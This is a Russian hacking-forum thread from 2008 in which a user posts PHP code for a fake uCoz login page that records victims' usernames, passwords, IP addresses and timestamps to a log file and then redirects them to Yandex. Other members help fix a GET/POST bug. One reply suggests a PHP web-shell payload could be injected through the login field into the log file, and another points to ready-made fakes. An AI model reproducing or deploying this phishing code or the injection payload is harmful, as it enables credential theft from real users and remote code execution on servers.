Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   фейк юкоза (https://forum.antichat.xyz/showthread.php?t=87672)

-=Dem0n=- 06.10.2008 01:23
фейк юкоза
 
Хотел создать фейк юкоза но ничего не получилось получил в адресной строке такую фигню
http://localhost/cs.php?user=qwert&password=qwert&rem=1&go=%C2%F5%E E%E4
вот фейк
PHP код:
<?php 
ob_start();  
function reglog($filename$user$password
{                                
    $d date("d.m.Y - H.i.s"); 
    $addr getenv('REMOTE_ADDR');
    $str 'Login '.$user."\n";
    $str .= 'Password '.$password."\n";
    $str .= 'IP '.$addr."\n";
    $str .= 'Date '.$d."\n";         
        
    $f fopen($filename"a+");
    fwrite($f$str."\n");
    fclose($f);   
    header('location: http://yandex.ru');
    return true;
}

$filename 'log.php';

if (isset($_POST['go'])) reglog($filename$_POST['user'], $_POST['password']);

ob_end_flush();
?>
после слова вход закрыл форму </form> имя типа submit - go
вроде все правильно.

NuR 06.10.2008 01:34
if (isset($_POST['go'])) reglog($filename, $_POST['user'], $_POST['password'])
вот тут подразумеваеться что ты данные постом передаешь, а на самом деле ты шлешь их GET

etc 06.10.2008 01:54
Я, несмотря на свой, в меру изощреный ум, ох*ел от такого фейка.

NuR 06.10.2008 02:00
$filename = 'log.php';

if (isset($_POST['go'])) reglog($filename,
очень тру кстате =) а вдруг холдера завут <? system($_GET['d']);?> ?=)

-=Dem0n=- 06.10.2008 13:17
Всем спасибо разобрался:)

P3L3NG 06.10.2008 13:29
найди созданныемной топики - фЭйк юкоза и юзай=)


Время: 17:27